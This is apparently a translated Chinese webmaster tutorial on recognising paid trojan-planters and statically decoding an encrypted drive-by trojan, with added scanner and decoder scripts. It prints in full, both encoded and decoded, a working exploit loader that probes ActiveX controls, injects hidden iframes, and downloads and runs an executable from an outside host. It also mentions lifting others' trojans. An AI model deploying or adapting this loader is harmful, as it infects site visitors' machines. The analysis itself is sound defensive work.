
How to recognize trojan-planters and decode an encrypted web trojan

Trojan-planters (挂马者, people who pay webmasters to embed drive-by exploit pages) like to target picture sites, movie sites, link directories and other entertainment sites. If your technical skills are limited and you do not want your site serving trojans, how do you recognize a trojan-planter when one approaches you? (Webmasters who want to earn that money are the exception and can skip this.)

1, How to recognize a trojan-planter?

  1.1, One day a stranger adds you on QQ and offers to buy your traffic at a high price (typically 100 yuan per 10,000 IPs, priced by IP quality). Everyone can work out the rest: what legitimate advertising is worth 100 yuan per 10,000 visitors? 99% of the time it is someone planting trojans.

  1.2, One day a stranger adds you on QQ wanting to buy a text or image ad, but insists that the ad be placed through a JS call or a frame (iframe) "so they can count impressions". Unless you actually want to host trojans, block them on QQ on the spot: this is a trojan-planter 100% of the time. A friend of mine fell for exactly this; the buyer offered 50 yuan per 10,000 IPs, paid per impression. When I finally told him his site was serving trojans he had no idea what had happened, and then got so angry he swore he would find ten thousand bots and DDoS the guy.

  1.3, If you do not believe point 1.2, put the buyer's ad code on your site and your antivirus stays silent, watch how the page behaves when it loads. If the page stalls or IE freezes, there is a trojan, 100%. If you have RealOne installed without patches and the RealOne player pops up for a moment when the page opens, there is a trojan, 100%. (Run this test in a throwaway virtual machine, never on the machine you administer the site from: a page that makes RealOne flash is a page that has just tried to exploit it.)

/////////////////BY 俺老虎 ()////////////////////

2, How to find and decode an encrypted web trojan?

  2.1, Of course, this method cannot decode every encrypted web trojan.

  2.2, I picked a picture site at random (sorry to that brother, it really was random). Opening the site stalled my browser for a full minute and popped up RealOne. That settles that it is carrying a trojan, so let us dissect it and dig the trojan out.

    2.2.1, View the source and press Ctrl+F to search for "iframe": nothing. So the webmaster did not plant a frame directly in the page source (a script can still write one at load time, which is exactly what happens here). Keep going and search for "script": this turns up <SCRIPT language=javascript src="admin/js/top.js"></SCRIPT>. The trojan may well be hanging in there, so download the file. Its content is: document.writeln("<iframe src=http:\/\/www.iceak.net\/dl19.htm?001 width=1 height=1><\/iframe>"); Sure enough...

    2.2.2, Width and height both set to 1 so nobody sees it, eh? Open that URL and view its source: another frame, this time with zero height: <iframe src=news.html width=100 height=0></iframe>

    2.2.3, Open that one too... and here is the content. I was half expecting ten layers of nesting. It reads:
<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("\151\146\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\56\151\156\144\145\170\117\146\50\47\117\113\47\51\75\75\55\61\51\173\15\12\164\162\171\173\166\141\162\40\145\145\145\145\145\145\145\145\73\15\12\166\141\162\40\144\163\142\75\42\113\141\163\160\145\162\163\153\171\42\73\15\12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\134\170\66\146\134\170\66\62\134\170\66\141\134\170\66\65\134\170\66\63\134\170\67\64\42\51\51\73\15\12\166\141\162\40\122\151\163\151\156\147\75\42\134\170\66\63\134\170\66\143\134\170\66\61\134\170\67\63\134\170\67\63\134\170\66\71\134\170\66\64\42\73\15\12\166\141\162\40\113\126\62\60\60\70\75\42\134\170\64\61\134\170\66\64\134\170\66\146\134\170\66\64\134\170\66\62\134\170\62\145\134\170\65\63\134\170\67\64\134\170\67\62\134\170\66\65\134\170\66\61\134\170\66\144\42\73\15\12\166\141\162\40\113\141\163\160\145\162\163\153\171\75\42\134\170\66\63\134\170\66\143\134\170\67\63\134\170\66\71\134\170\66\64\134\170\63\141\134\170\64\62\134\170\64\64\134\170\63\71\134\170\63\66\134\170\64\63\134\170\63\65\134\170\63\65\134\170\63\66\134\170\62\144\134\170\63\66\134\170\63\65\134\170\64\61\134\170\63\63\134\170\62\144\134\170\63\61\134\170\63\61\134\170\64\64\134\170\63\60\134\170\62\144\134\170\63\71\134\170\63\70\134\170\63\63\134\170\64\61\134\170\62\144\134\170\63\60\134\170\63\60\134\170\64\63\134\170\63\60\134\170\63\64\134\170\64\66\134\170\64\63\134\170\63\62\134\170\63\71\134\170\64\65\134\170\63\63\134\170\63\66\42\73\15\12\141\144\157\56\163\145\164\101\164\164\162\151\142\165\164\145\50\122\151\163\151\156\147\54\113\141\163\160\145\162\163\153\171\51\73\15\12\166\141\162\40\141\163\75\141\144\157\56\143\162\145\141\164\145\157\142\152\145\143\164\50\113\126\62\60\60\70\54\42\42\51\175\15\12\143\141\164\143\150\50\145\145\145\145\145\145\145\145\51\173\175\73\15\12\146\151\156\141\154\154\171\173\15\12\166\141\162\40\145\170\160\151\162\145\163\75\156\145\167\40\104\141\164\145\50\51\73\15\12\145\170\160\151\162\145\163\56\163\145\164\124\151\155\145\50\145\170\160\151\162\145\163\56\147\145\164\124\151\155\145\50\51\53\63\52\66\60\52\66\60\52\61\60\60\60\51\73\15\12\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\75\47\117\113\75\131\145\163\73\160\141\164\150\75\57\73\145\170\160\151\162\145\163\75\47\53\145\170\160\151\162\145\163\56\164\157\107\115\124\123\164\162\151\156\147\50\51\73\15\12\151\146\50\145\145\145\145\145\145\145\145\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\163\143\162\151\160\164\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\63\56\61\141\62\142\63\143\60\56\156\145\164\134\57\155\163\60\66\60\61\64\56\152\163\76\74\134\57\163\143\162\151\160\164\76\42\51\175\15\12\145\154\163\145\173\15\12\164\162\171\173\166\141\162\40\146\146\146\146\146\146\146\146\73\15\12\166\141\162\40\157\165\162\147\141\155\145\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\134\170\64\67\134\170\64\143\134\170\64\63\134\170\64\70\134\170\64\61\134\170\65\64\134\170\62\145\134\170\64\67\134\170\64\143\134\170\64\63\134\170\66\70\134\170\66\61\134\170\67\64\134\170\64\63\134\170\67\64\134\170\67\62\134\170\66\143\134\170\62\145\134\170\63\61\42\51\73\175\15\12\143\141\164\143\150\50\146\146\146\146\146\146\146\146\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\146\146\146\146\146\146\146\146\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\63\56\61\141\62\142\63\143\60\56\156\145\164\57\107\114\127\117\122\114\104\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\147\147\147\147\147\147\147\147\73\15\12\166\141\162\40\163\164\157\162\155\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\134\170\64\144\134\170\65\60\134\170\65\63\134\170\62\145\134\170\65\63\134\170\67\64\134\170\66\146\134\170\67\62\134\170\66\144\134\170\65\60\134\170\66\143\134\170\66\61\134\170\67\71\134\170\66\65\134\170\67\62\42\51\73\175\15\12\143\141\164\143\150\50\147\147\147\147\147\147\147\147\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\147\147\147\147\147\147\147\147\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\63\56\61\141\62\142\63\143\60\56\156\145\164\57\123\164\157\162\155\111\111\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\150\150\150\150\150\150\150\150\73\15\12\166\141\162\40\122\145\141\154\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\134\170\64\71\134\170\64\65\134\170\65\62\134\170\65\60\134\170\64\63\134\170\67\64\134\170\66\143\134\170\62\145\134\170\64\71\134\170\64\65\134\170\65\62\134\170\65\60\134\170\64\63\134\170\67\64\134\170\66\143\134\170\62\145\134\170\63\61\42\51\73\175\15\12\143\141\164\143\150\50\150\150\150\150\150\150\150\150\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\150\150\150\150\150\150\150\150\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\163\103\162\111\160\124\40\114\101\156\107\165\101\147\105\75\42\152\101\166\101\163\103\162\111\160\124\42\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\63\56\61\141\62\142\63\143\60\56\156\145\164\134\57\162\145\141\154\56\152\163\76\74\134\57\163\143\162\151\160\164\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\151\151\151\151\151\151\151\151\73\15\12\166\141\162\40\164\150\165\156\144\145\162\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\134\170\64\64\134\170\65\60\134\170\64\63\134\170\66\143\134\170\66\71\134\170\66\65\134\170\66\145\134\170\67\64\134\170\62\145\134\170\65\66\134\170\66\146\134\170\66\64\42\51\73\175\15\12\143\141\164\143\150\50\151\151\151\151\151\151\151\151\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\151\151\151\151\151\151\151\151\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\63\56\61\141\62\142\63\143\60\56\156\145\164\57\124\150\165\156\144\145\162\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\153\153\153\153\153\153\153\153\73\15\12\166\141\162\40\102\141\151\144\165\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\64\62\134\170\66\61\134\170\67\62\134\170\62\145\134\170\65\64\134\170\66\146\134\170\66\146\134\170\66\143\42\51\73\175\15\12\143\141\164\143\150\50\153\153\153\153\153\153\153\153\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\153\153\153\153\153\153\153\153\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\102\141\151\144\165\133\42\134\170\64\64\134\170\66\143\134\170\66\146\134\170\66\61\134\170\66\64\42\53\42\134\170\64\64\134\170\65\63\42\135\50\42\150\164\164\160\72\57\57\165\163\145\162\63\56\61\141\62\142\63\143\60\56\156\145\164\57\102\141\151\144\165\56\143\141\142\42\54\40\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\62\145\134\170\66\65\134\170\67\70\134\170\66\65\42\54\40\60\51\175\175\15\12\151\146\50\146\146\146\146\146\146\146\146\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\147\147\147\147\147\147\147\147\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\150\150\150\150\150\150\150\150\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\151\151\151\151\151\151\151\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\15\12\173\15\12\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142\157\165\164\72\142\154\141\156\153\42\51\73\175\15\12\175\175\175")
</script>

    2.2.4, Those who can read that need no explanation; for those who cannot, it is the content of the web trojan, encrypted into octal escape sequences (the window.onerror line above it swallows every script error so that failed exploit attempts stay silent). How do we find out what it actually does? Next step!
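The hunt in 2.2.1 to 2.2.3 can be scripted. The following is an added example and not the article's own code: scanHtml() flags the tells the article relied on (iframes sized 0/1 px or hidden by CSS, included scripts to chase, inline script that suppresses errors or feeds an escaped blob to eval), and scanJs() does the same for a downloaded .js file such as admin/js/top.js. The sample inputs are constructed from the three hops the article describes; the host name www.example.invalid and the stats.example.invalid script are made up to show the "own host" versus "external host" distinction.

```javascript
'use strict';
// Added example, not the article's own code: script the hunt from 2.2.1-2.2.3.

// Value of one attribute inside a tag (quoted or bare), or null.
function attr(tag, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
}

// Host name of an absolute URL (tolerating the \/ escaping used inside JS
// strings), or null for a relative URL.
function hostOf(url) {
  const m = /^(?:https?:)?\/\/([^\/:?#\s]+)/i.exec(url.replace(/\\\//g, '/').trim());
  return m ? m[1].toLowerCase() : null;
}

// Tells inside JavaScript source text.
function scanJs(js) {
  const findings = [];
  // document.write / writeln that injects an <iframe> or <script> at load time
  for (const m of js.matchAll(/document\.write(?:ln)?\s*\(([^;]*)\)/gi)) {
    if (/<\s*(iframe|script)\b/i.test(m[1])) {
      const src = attr(m[1], 'src');
      findings.push({ kind: 'runtime-injected-tag', src: src ? src.replace(/\\\//g, '/') : null });
    }
  }
  // eval() fed a string literal built from octal/hex escapes (the 2.2.3 layout)
  if (/\beval\s*\(\s*["'](?:\\(?:[0-7]{1,3}|x[0-9a-fA-F]{2})){4,}/.test(js)) {
    findings.push({ kind: 'escaped-eval', src: null });
  }
  // window.onerror swallowing every error so failed exploits stay quiet
  if (/window\.onerror\s*=\s*function\s*\([^)]*\)\s*\{\s*return\s+true/.test(js))
    findings.push({ kind: 'error-suppression', src: null });
  return findings;
}

// Tells inside page HTML. ownHost separates scripts served from elsewhere
// from the site's own files, which still have to be downloaded and passed
// to scanJs (the article's top.js was a local file).
function scanHtml(html, ownHost) {
  const findings = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const w = parseInt(attr(tag, 'width'), 10);
    const h = parseInt(attr(tag, 'height'), 10);
    const tiny = (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attr(tag, 'style') || '');
    if (tiny || hidden) findings.push({ kind: 'hidden-iframe', src: attr(tag, 'src') });
  }
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=[^>]*>/gi)) {
    const src = attr(m[0], 'src');
    const host = hostOf(src || '');
    findings.push({ kind: 'included-script', src, external: host !== null && host !== ownHost });
  }
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    for (const f of scanJs(m[1])) findings.push(f);
  }
  return findings;
}

// --- constructed samples modelled on the article's three hops ---------------
const OWN_HOST = 'www.example.invalid'; // the audited site's host (made up)
// Hop 1: the page; the include is the article's, the stats script is made up.
const SAMPLE_PAGE = '<html><head><SCRIPT language=javascript src="admin/js/top.js"></SCRIPT>\n' +
  '<script src="http://stats.example.invalid/c.js"></script></head><body></body></html>';
// admin/js/top.js as quoted in 2.2.1.
const SAMPLE_TOP_JS = 'document.writeln("<iframe src=http:\\/\\/www.iceak.net\\/dl19.htm?001 width=1 height=1><\\/iframe>");';
// Hop 2 (2.2.2) and the head of hop 3 (2.2.3, eval blob shortened).
const SAMPLE_HOP2 = '<p>news</p><iframe src=news.html width=100 height=0></iframe>';
const SAMPLE_HOP3 = '<script>window.onerror=function(){return true;}</script>\n' +
  '<script>\nwindow.defaultStatus="done";\neval("\\151\\146\\50\\144\\157\\143\\165\\155\\145\\156\\164")\n</script>';

console.log(JSON.stringify({
  page: scanHtml(SAMPLE_PAGE, OWN_HOST),
  topJs: scanJs(SAMPLE_TOP_JS),
  hop2: scanHtml(SAMPLE_HOP2, OWN_HOST),
  hop3: scanHtml(SAMPLE_HOP3, OWN_HOST),
}, null, 1));
```

Each hop yields the next file to fetch (the src of the flagged tag); a real audit loops until a hop produces an escaped-eval finding, which is where the decoding in 2.3 starts.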

  2.3, With the encrypted content in hand, do the following and you get the decrypted content. The trick works because the JavaScript engine decodes the octal escapes when it parses the string literal, and a <textarea> then displays the result as plain text instead of running it. Two cautions: paste the escapes between the quotes exactly, backslashes included, and remember that a payload containing a closing </textarea> tag or an unbalanced quote will break out of the textarea and may run, so do this on a throwaway machine.

    2.3.1, Create a file A.HTML of your own with this content:
<script>
document.write("<textarea cols=55 rows=10>"+ " paste all the unreadable octal escapes from inside eval() here " +"</textarea>");
</script>

    2.3.2, Save it and open A.HTML in a browser; the trojan reads as follows (the iframe and script targets are the ones encoded in the blob above):

if(document.cookie.indexOf('OK')==-1){
try{var eeeeeeee;
var dsb="Kaspersky";
var ado=(document.createElement("\x6f\x62\x6a\x65\x63\x74"));
var Rising="\x63\x6c\x61\x73\x73\x69\x64";
var KV2008="\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d";
var Kaspersky="\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(eeeeeeee){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(eeeeeeee!="[object Error]"){
document.write("<script src=http:\/\/user3.1a2b3c0.net\/ms06014.js><\/script>")}
else{
try{var ffffffff;
var ourgame=new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]"){
document.write('<iframe style=display:none src="http://user3.1a2b3c0.net/GLWORLD.html"></iframe>')}}
try{var gggggggg;
var storm=new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72");}
catch(gggggggg){};
finally{if(gggggggg!="[object Error]"){
document.write('<iframe style=display:none src="http://user3.1a2b3c0.net/StormII.html"></iframe>')}}
try{var hhhhhhhh;
var Real=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6c\x2e\x49\x45\x52\x50\x43\x74\x6c\x2e\x31");}
catch(hhhhhhhh){};
finally{if(hhhhhhhh!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user3.1a2b3c0.net\/real.js><\/script>')}}
try{var iiiiiiii;
var thunder=new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64");}
catch(iiiiiiii){};
finally{if(iiiiiiii!="[object Error]"){
document.write('<iframe style=display:none src="http://user3.1a2b3c0.net/Thunder.html"></iframe>')}}
try{var kkkkkkkk;
var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");}
catch(kkkkkkkk){};
finally{if(kkkkkkkk!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64"+"\x44\x53"]("http://user3.1a2b3c0.net/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)}}
if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")
{
location.replace("about:blank");}
}}}

    2.3.3, Inside there are still strings of hex escapes such as "\x47\x4c\x43\x48\x41\x54\x2e\x47"; these decode to the real values by the same steps. Decoded, they name the components the script probes: the clsid BD96C556-65A3-11D0-983A-00C04FC29E36 created through Adodb.Stream (the MDAC RDS.DataSpace control of MS06-014), GLCHAT.GLChatCtrl.1, MPS.StormPlayer, IERPCtl.IERPCtl.1 (RealPlayer), DPClient.Vod (Thunder) and BaiduBar.Tool. Each control that instantiates without throwing gets a matching exploit page or script loaded from user3.1a2b3c0.net (ms06014.js, GLWORLD.html, StormII.html, real.js, Thunder.html), BaiduBar.Tool's DloadDS is called with Baidu.cab and the file name Baidu.exe, and the OK=Yes cookie, valid for three hours, makes the page skip the whole routine on a revisit. Looking at this trojan, I am not going to dig any deeper. You can see it is a combination web trojan, containing an MS06-014 trojan, a RealOne trojan, a Thunder trojan and so on. In short, it uses every hole it can find to make you download the trojan or plugin.
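The A.HTML trick of 2.3.1 and the second, hex-escaped layer of 2.3.3 can both be handled with a small parser that never hands the blob to a browser. The following is an added example and not the article's own code: unescapeJs() decodes one layer of JavaScript string escapes, decodeEvalBlob() pulls the literal out of eval("..."), decodes it, then decodes the escapes inside every string literal of the result, and indicators() lists the URLs, CLSIDs and ProgIDs worth blocking or hunting for in logs. The sample is constructed from four statements copied verbatim from the article's own blob; nothing in it is executed, the output is text.

```javascript
'use strict';
// Added example, not the article's own code: decode the eval("...") blob of
// 2.2.3 and the \xHH strings of 2.3.3 statically.

// Decode the escape sequences of a JavaScript string-literal body:
// \NNN octal, \xHH, \uHHHH, \n \r \t \b \f \v, and \<other> -> <other>.
function unescapeJs(body) {
  const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v' };
  let out = '';
  for (let i = 0; i < body.length; i++) {
    const c = body[i];
    if (c !== '\\' || i + 1 >= body.length) { out += c; continue; }
    const n = body[i + 1];
    const hex2 = body.substr(i + 2, 2);
    const hex4 = body.substr(i + 2, 4);
    if (n === 'x' && /^[0-9a-fA-F]{2}$/.test(hex2)) {
      out += String.fromCharCode(parseInt(hex2, 16)); i += 3;
    } else if (n === 'u' && /^[0-9a-fA-F]{4}$/.test(hex4)) {
      out += String.fromCharCode(parseInt(hex4, 16)); i += 5;
    } else if (/[0-7]/.test(n)) {
      // up to three octal digits; the value must fit in one byte
      let oct = /^[0-7]{1,3}/.exec(body.substr(i + 1, 3))[0];
      if (parseInt(oct, 8) > 255) oct = oct.slice(0, 2);
      out += String.fromCharCode(parseInt(oct, 8)); i += oct.length;
    } else {
      out += simple[n] !== undefined ? simple[n] : n; i += 1; // \/ \" \' \\
    }
  }
  return out;
}

// One string literal with its escapes, for either quote character.
const STRING_LITERAL = /(["'])((?:\\[\s\S]|(?!\1)[^\\])*)\1/g;

// The argument of the first eval("...") / eval('...') in a script. Line
// breaks inside the literal can only come from copy-paste wrapping (a JS
// string cannot contain a raw newline), so they are removed before decoding.
function evalArgument(js) {
  const m = /\beval\s*\(\s*(["'])((?:\\[\s\S]|(?!\1)[^\\])*)\1\s*\)/.exec(js);
  return m ? m[2].replace(/\r?\n/g, '') : null;
}

// Second layer: decode the escapes inside every string literal of decoded code.
function decodeStringLiterals(js) {
  return js.replace(STRING_LITERAL, (_, q, body) => q + unescapeJs(body) + q);
}

// Both layers: the octal blob, then the \xHH strings it produces.
function decodeEvalBlob(js) {
  const arg = evalArgument(js);
  return arg === null ? null : decodeStringLiterals(unescapeJs(arg));
}

// What to block and what to search logs for.
function indicators(decoded) {
  const uniq = (a) => Array.from(new Set(a));
  return {
    urls: uniq(Array.from(decoded.matchAll(/https?:\/\/[^\s"'<>)]+/g), (m) => m[0])),
    clsids: uniq(Array.from(decoded.matchAll(/clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})/gi), (m) => m[1].toUpperCase())),
    progids: uniq(Array.from(decoded.matchAll(/ActiveXObject\s*\(\s*(["'])([^"']+)\1/g), (m) => m[2])),
  };
}

// Constructed sample: the head of the 2.2.3 page plus a shortened eval()
// argument made of four statements taken verbatim from the article's blob
// (the cookie check, createElement, the clsid string, the RealPlayer probe
// and the ms06014.js loader). Backslashes are doubled because this is JS
// source; the string value holds single backslashes, exactly as on the page.
const SAMPLE = '<script>window.onerror=function(){return true;}</script>\n<script>\neval("' +
  '\\151\\146\\50\\144\\157\\143\\165\\155\\145\\156\\164\\56\\143\\157\\157\\153\\151\\145\\56\\151\\156\\144\\145\\170\\117\\146\\50\\47\\117\\113\\47\\51\\75\\75\\55\\61\\51\\173\\15\\12' +
  '\\166\\141\\162\\40\\141\\144\\157\\75\\50\\144\\157\\143\\165\\155\\145\\156\\164\\56\\143\\162\\145\\141\\164\\145\\105\\154\\145\\155\\145\\156\\164\\50\\42\\134\\170\\66\\146\\134\\170\\66\\62\\134\\170\\66\\141\\134\\170\\66\\65\\134\\170\\66\\63\\134\\170\\67\\64\\42\\51\\51\\73\\15\\12' +
  '\\166\\141\\162\\40\\113\\141\\163\\160\\145\\162\\163\\153\\171\\75\\42\\134\\170\\66\\63\\134\\170\\66\\143\\134\\170\\67\\63\\134\\170\\66\\71\\134\\170\\66\\64\\134\\170\\63\\141\\134\\170\\64\\62\\134\\170\\64\\64\\134\\170\\63\\71\\134\\170\\63\\66\\134\\170\\64\\63\\134\\170\\63\\65\\134\\170\\63\\65\\134\\170\\63\\66\\134\\170\\62\\144\\134\\170\\63\\66\\134\\170\\63\\65\\134\\170\\64\\61\\134\\170\\63\\63\\134\\170\\62\\144\\134\\170\\63\\61\\134\\170\\63\\61\\134\\170\\64\\64\\134\\170\\63\\60\\134\\170\\62\\144\\134\\170\\63\\71\\134\\170\\63\\70\\134\\170\\63\\63\\134\\170\\64\\61\\134\\170\\62\\144\\134\\170\\63\\60\\134\\170\\63\\60\\134\\170\\64\\63\\134\\170\\63\\60\\134\\170\\63\\64\\134\\170\\64\\66\\134\\170\\64\\63\\134\\170\\63\\62\\134\\170\\63\\71\\134\\170\\64\\65\\134\\170\\63\\63\\134\\170\\63\\66\\42\\73\\15\\12' +
  '\\166\\141\\162\\40\\122\\145\\141\\154\\75\\156\\145\\167\\40\\101\\143\\164\\151\\166\\145\\130\\117\\142\\152\\145\\143\\164\\50\\42\\134\\170\\64\\71\\134\\170\\64\\65\\134\\170\\65\\62\\134\\170\\65\\60\\134\\170\\64\\63\\134\\170\\67\\64\\134\\170\\66\\143\\134\\170\\62\\145\\134\\170\\64\\71\\134\\170\\64\\65\\134\\170\\65\\62\\134\\170\\65\\60\\134\\170\\64\\63\\134\\170\\67\\64\\134\\170\\66\\143\\134\\170\\62\\145\\134\\170\\63\\61\\42\\51\\73\\15\\12' +
  '\\144\\157\\143\\165\\155\\145\\156\\164\\56\\167\\162\\151\\164\\145\\50\\42\\74\\163\\143\\162\\151\\160\\164\\40\\163\\162\\143\\75\\150\\164\\164\\160\\72\\134\\57\\134\\57\\165\\163\\145\\162\\63\\56\\61\\141\\62\\142\\63\\143\\60\\56\\156\\145\\164\\134\\57\\155\\163\\60\\66\\60\\61\\64\\56\\152\\163\\76\\74\\134\\57\\163\\143\\162\\151\\160\\164\\76\\42\\51\\175' +
  '")\n</script>';

const DECODED = decodeEvalBlob(SAMPLE);
console.log(DECODED);
console.log(JSON.stringify(indicators(DECODED), null, 1));
```

Paste the whole blob from 2.2.3 in place of the sample and the output is the script shown in 2.3.2 with the hex layer already resolved, which is the point: the decoding that the browser does for the attacker can be done for the analyst without ever loading the page.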

    2.3.4, This method will also let you lift someone else's "VIP" web trojan. But it only works on radix-conversion encoding; some web trojans ship their own decryption function. Those can be cracked too, because however it is encrypted it only has to be unreadable to a person, the machine still has to read it. So cracking such a scheme is just as simple: change the corresponding return (or the final eval) into document.write and you see its true face just the same.

    Finally, publishing this will surely annoy a lot of people... Am I guilty? Maybe! Cutting off someone's livelihood is not right either. But if webmasters stop serving malware and netizens stop being afraid to open web pages, then the era in which "going online" just means QQ is over; more people will come online to actually browse pages, and would that not widen the road to money for us webmasters? Think of it as a minuscule contribution to a cleaner sky over the Chinese internet...
